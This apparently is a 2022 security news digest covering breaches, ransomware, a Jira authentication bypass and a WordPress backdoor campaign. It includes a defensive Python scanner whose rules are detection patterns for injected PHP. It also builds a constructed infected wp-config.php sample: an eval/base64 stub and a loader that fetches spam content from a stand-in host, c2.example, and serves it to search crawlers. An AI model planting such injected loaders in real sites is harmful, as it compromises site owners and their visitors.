FBI says compromised US academic credentials are available on various cybercrime forums

The FBI warned on May 26, 2022 that thousands of compromised credentials harvested from US college and university networks are circulating on online crime forums in Russia and elsewhere, and could lead to subsequent cyber attacks against individual users or affiliated organizations. “Credential harvesting against an organization is often a byproduct of spear-phishing, ransomware, or other cyber intrusion tactics”, says the alert.

  • As of January 2022, Russian cyber criminal forums offered for sale or posted for public access the network credentials and virtual private network accesses to a multitude of identified US-based universities and colleges across the country, some of which included screenshots as proof of access.
  • In May 2021, over 36,000 email and password combinations (some of which may have been duplicates) for email accounts ending in .edu were identified on a publicly available instant messaging platform.
  • In late 2020, US territory-based university account usernames and passwords with the domain .edu were found for sale on the dark web. The seller listed approximately 2,000 unique usernames with accompanying passwords.

The FBI alert offered recommendations:

  • Keep all operating systems and software up to date.
  • Implement user training programs and phishing exercises for students and faculty to raise awareness.
  • Require strong, unique passwords for all accounts.
  • Require multi-factor authentication (MFA).
  • Restrict where accounts and credentials can be used.
  • Segment networks to help prevent unauthorized access.
  • Identify, detect, and investigate abnormal activity with network-monitoring tools.
  • Use anomaly detection tools.
  • Enforce principle of least privilege through authorization policies.
  • Secure and closely monitor remote desktop protocol (RDP) use.
  • Document external remote connections.

Read more about it here.

US Agricultural Equipment Giant AGCO hit by ransomware attack

Agricultural machinery giant AGCO announced on May 5, 2022 that a ransomware attack had impacted some of its production facilities. “AGCO is still investigating the extent of the attack, but it is anticipated that its business operations will be adversely affected for several days and potentially longer to fully resume all services depending upon how quickly the Company is able to repair its systems” reads the announcement.

In an update provided on May 16, 2022, AGCO said: “A majority of the affected production sites and parts operations resumed operational activities last week or today. The remainder of the sites are expected to begin operations during the balance of this week.” The company also reported that data had been exfiltrated during the ransomware attack. While it has no retail operations, and therefore holds no privacy-protected consumer data, it is still evaluating the scope and consequences of the data loss.

AGCO is based out of Duluth, Georgia, US, and has about 20,000 employees.

Read more about it here.

Car rental giant Sixt hit by cyberattack, customer service delayed

Car rental company Sixt confirmed on May 1, 2022 that it had detected “IT irregularities” on April 29, and had been subject to a cyberattack. A statement made by the company said: “Response measures were implemented immediately in accordance with pre-planned security protocols. Subsequently, it has been confirmed that Sixt SE was subject to a cyber-attack, which Sixt was able to contain at an early stage.” The statement further said: “As a standard precautionary measure, access to IT systems was immediately restricted and the pre-planned recovery processes were initiated. Many central Sixt systems, in particular the website and apps were kept up and running.”

Customers who called the company heard a recorded message telling them, “Due to a technical problem, we are currently unavailable and can only process e-mail inquiries with a delay.”

The type of attack has not been made public, and it is unclear if it was a ransomware attack. The company also declined to say whether customer or employee data was accessed during the cyberattack.

Sixt employs 7,000 people and operates about 2,000 locations across 110 countries.

Read more about it here.

Atlassian addresses a critical Jira authentication bypass vulnerability

Atlassian, an Australian software company that develops products for software developers, has published a security advisory warning that its Jira and Jira Service Management products are affected by a critical authentication bypass vulnerability in Seraph, the company’s web application security framework.

Seraph is used in its Jira and Confluence products for handling all login and logout requests via a system of pluggable core elements.

The flaw is tracked as CVE-2022-0540 and carries a CVSS score of 9.9 out of 10. It allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request to vulnerable endpoints, namely WebWork actions exposed by apps that rely on an affected Seraph configuration; whether a given instance is exploitable therefore depends on which first- and third-party apps are installed.

The affected products are Jira Core Server, Jira Software Server, Jira Software Data Center, Jira Service Management Server, and Jira Service Management Data Center. Only specific versions are impacted, so check the advisory's version table before assuming exposure.

Administrators are strongly advised to update to one of the fixed versions. If this is not possible, Atlassian recommends updating the affected apps to a version that has remediated the risk, or disabling the vulnerable apps until patching is possible.

Read more about it here.

Wind turbine manufacturer Nordex shuts down IT systems in response to cyberattack

Nordex Group, one of the largest manufacturers of wind turbines, was hit by a cyberattack that forced the company to shut down some of its IT systems.

Based in Hamburg, Germany, Nordex designs, manufactures and sells wind turbines, employing about 8,500 people.

On April 2, 2022, the company announced that on March 31, 2022, it detected it was “subject to a cyber security incident. The intrusion was noted in an early stage and response measures initiated immediately in line with crisis management protocols. As a precautionary measure, the company decided to shut down IT systems across multiple locations and business units.”

Nordex did not disclose further technical details of the cyberattack.

Read more about it here.

Hackers breached Mailchimp to phish crypto users

Mailchimp, a veteran email marketing platform, has confirmed that hackers who obtained employee credentials through social engineering used an internal tool on its platform to steal audience data from 102 of its clients; the stolen data was then used to send phishing emails to users of cryptocurrency services.

The breach came to light when users of the Trezor hardware cryptocurrency wallet reported receiving convincing phishing emails. The emails claimed to be from Trezor, told recipients that their accounts had been exposed in a data breach, and linked to a purported updated version of Trezor Suite together with instructions for setting up a new PIN. In reality, the link led to a phishing site hosting a fake Trezor Suite that asked users to enter their recovery seed; since a hardware wallet's seed never leaves the device in normal use, tricking the owner into typing it into software is what gave the attackers access to the wallets' contents.

Users of Trezor devices have been advised to report any new phishing attempts directly to Trezor, at security@trezor.io.

Read more about it here.

US FCC adds Kaspersky to its Covered List due to unacceptable national security risk

On March 25, 2022, the US Federal Communications Commission (FCC) added Kaspersky and two Chinese companies to its Covered List, on the grounds that they pose an unacceptable risk to US national security.

“The Federal Communications Commission’s Public Safety and Homeland Security Bureau today added equipment and services from three entities – AO Kaspersky Lab, China Telecom (Americas) Corp, and China Mobile International USA Inc. – to its list of communications equipment and services that have been deemed a threat to national security, consistent with requirements in the Secure and Trusted Communications Networks Act of 2019.” reads the FCC statement.

The FCC’s decision follows an advisory released earlier that month by Germany’s Federal Office for Information Security (BSI) against using Kaspersky's security products in the country, citing doubts about the reliability of the manufacturer, which remains bound by Russian laws and regulations.

Read more about it here.

Hundreds of GoDaddy-hosted sites backdoored in hacking campaign

A new hacking campaign infecting hundreds of GoDaddy-hosted sites has been uncovered. The discovery comes from Wordfence, whose team first observed the malicious activity on March 11, 2022, with 298 websites infected by the backdoor within 24 hours, 281 of which were hosted on GoDaddy’s Managed WordPress service.

The backdoor is a Google search SEO-poisoning tool known since 2015, injected into the site's wp-config.php file. It fetches spam link templates from command-and-control (C2) domains and uses them to inject spam pages into search results. The campaign mostly uses pharmaceutical spam templates, served to visitors of the compromised websites in place of the sites' actual content.

Users of GoDaddy’s Managed WordPress platform should inspect their wp-config.php file for injected code, since this is where the backdoor is implanted.
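A wp-config.php file is a short, highly predictable PHP file, which makes injected code stand out if you know what to look for. The following scanner is an added example written for this page, not Wordfence's or GoDaddy's tooling, and it does not encode the signature of this particular backdoor (the page does not give one). Instead it applies generic indicators of injected PHP: dynamic `eval`, decoders such as `base64_decode`, remote fetches, branching on request headers like the User-Agent, and any statement after WordPress's own "That's all, stop editing!" marker other than the `ABSPATH` and `wp-settings.php` lines. The clean and infected sample files, and the `c2.example` hostname, are constructed for the demo.

```python
"""Heuristic scan of a WordPress wp-config.php for injected PHP.

Added example, not Wordfence's or GoDaddy's code. Rules are generic indicators
of injected PHP, not the signature of any specific campaign; the sample files
and the c2.example host are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    snippet: str


# PHP string literals are blanked before structural rules run, so text inside
# salts, passwords or URLs cannot trigger them (e.g. a '@' in DB_PASSWORD).
_STRING_RE = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"")


def _mask_strings(line: str) -> str:
    return _STRING_RE.sub("''", line)


# (rule name, pattern, match against the string-masked line?)
RULES = [
    ("dynamic-eval", re.compile(r"\b(eval|assert|create_function)\s*\(", re.I), True),
    ("decoder", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|hex2bin)\s*\(", re.I), True),
    ("request-dependent", re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b"), True),
    ("variable-function-call", re.compile(r"\$\w+\s*\("), True),
    ("error-suppressed-call", re.compile(r"@\s*[A-Za-z_]\w*\s*\("), True),
    ("remote-fetch", re.compile(
        r"\b(curl_init|fsockopen|stream_socket_client)\s*\("
        r"|\b(file_get_contents|fopen|readfile|include|require)(_once)?\s*\(?\s*['\"](https?|ftp|php|data):",
        re.I), False),
    ("long-encoded-literal", re.compile(r"['\"][A-Za-z0-9+/]{100,}={0,2}['\"]"), False),
    ("hex-escaped-string", re.compile(r"(\\x[0-9A-Fa-f]{2}){8,}"), False),
]
_MARKER_RE = re.compile(r"stop editing", re.I)
_EXPECTED_TAIL = ("ABSPATH", "wp-settings.php")  # the only code WordPress puts after the marker


def _is_comment(stripped: str) -> bool:
    return stripped.startswith(("//", "#", "/*", "*"))


def scan_wp_config(text: str) -> list[Finding]:
    """Return one Finding per (line, rule) hit; an empty list means no indicator fired."""
    findings: list[Finding] = []
    after_marker = False
    for no, raw in enumerate(text.splitlines(), start=1):
        stripped = raw.strip()
        if not stripped or _is_comment(stripped):
            after_marker = after_marker or bool(_MARKER_RE.search(stripped))
            continue
        masked = _mask_strings(raw)
        for name, rx, use_masked in RULES:
            if rx.search(masked if use_masked else raw):
                findings.append(Finding(no, name, stripped[:80]))
        # Any statement after the marker besides the ABSPATH/wp-settings.php lines is foreign.
        if after_marker and stripped not in ("{", "}", "?>") and not any(k in raw for k in _EXPECTED_TAIL):
            findings.append(Finding(no, "code-after-marker", stripped[:80]))
    return findings


def rules_hit(text: str) -> set[str]:
    return {f.rule for f in scan_wp_config(text)}


# Constructed, trimmed-down clean wp-config.php (DB values and salt are placeholders).
CLEAN_SAMPLE = """<?php
/**
 * The base configuration for WordPress
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 */
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wp_user' );
define( 'DB_PASSWORD', 'S3cret!p@ss(word)' );
define( 'AUTH_KEY', 'put your unique phrase here' );
$table_prefix = 'wp_';

/* That's all, stop editing! Happy publishing. */

if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""

# Constructed infection: an obfuscated stub at the top ('ZWNobyAxOw==' is just "echo 1;")
# and, appended after the marker, a loader that pulls a template from a C2 host and
# serves it to search-engine crawlers instead of the real site.
INFECTED_SAMPLE = CLEAN_SAMPLE.replace("<?php\n", "<?php\n@eval(base64_decode('ZWNobyAxOw=='));\n", 1) + (
    "\n$wp_cfg_tpl = @file_get_contents('http://spam-tpl.c2.example/t.php?h=' . $_SERVER['HTTP_HOST']);\n"
    "if ($wp_cfg_tpl !== false && stripos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {\n"
    "    echo $wp_cfg_tpl; exit;\n"
    "}\n"
)

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else INFECTED_SAMPLE
    for f in scan_wp_config(text):
        print(f"line {f.line_no:>4}  {f.rule:<22} {f.snippet}")
```

Run it as `python scan_wp_config.py /path/to/wp-config.php`; with no argument it scans the constructed infected sample, where the top stub trips the eval/decoder rules and the appended loader trips the remote-fetch, User-Agent and code-after-marker rules, while the clean sample produces nothing. The layering matters: the "code after marker" check catches anything appended to the file, but an attacker who injects near the top of the file is only caught by the content rules, so neither alone is sufficient. Legitimate configs that read `$_SERVER` (for example to set `WP_HOME` behind a reverse proxy) will produce a review item, so treat hits as leads to diff against a known-good copy rather than as a verdict, and when you do find an implant, restore the file from a trusted source and look for how it was written there rather than only deleting the lines.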

Read more about it here.

Ukrainian WordPress sites see massive attack volumes

Internet security companies have recorded a massive wave of cyberattacks against Ukrainian WordPress sites since Russia invaded Ukraine.

Cybersecurity firm Wordfence, which protects 8,320 WordPress websites belonging to universities, government, military, and law enforcement entities in Ukraine, reported 144,000 attacks on February 25, 2022 alone, three times the daily volume seen earlier in February across the Ukrainian websites it protects. The attacks compromised at least 30 Ukrainian university websites. The hacking group behind these attacks is a pro-Russian group called “theMx0nday”.

For the first time in its history, Wordfence has decided to automatically deploy real-time threat intelligence to all Ukrainian websites using its WordPress plugin, regardless of their subscription tier. Normally, this feature is only available to Premium customers. “We are doing this to assist in blocking cyberattacks targeting Ukraine. This update requires no action from users of the Free version of Wordfence on the UA top-level domain.” says their blog post.

Read more about it here.

CISA publishes a list of free cybersecurity tools and services

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) announced that it has compiled a list of free cybersecurity tools and services that can help organizations further advance their security capabilities. This living repository includes cybersecurity services provided by CISA, widely used open source tools, and free tools and services offered by private and public sector organizations across the cybersecurity community. CISA will also implement a process for organizations to submit additional free tools and services for inclusion on this list in the future.

The resources include guidelines on phishing assessment services, remote penetration tests, distributed denial-of-service (DDoS) protection, Project Shield, repositories for threat data, antivirus tools, forensics software, and backup services, among others.

CISA does not endorse the resources for any specific use case, so organizations need to evaluate the listed tools and services to determine whether they meet their needs.

Read more about it here.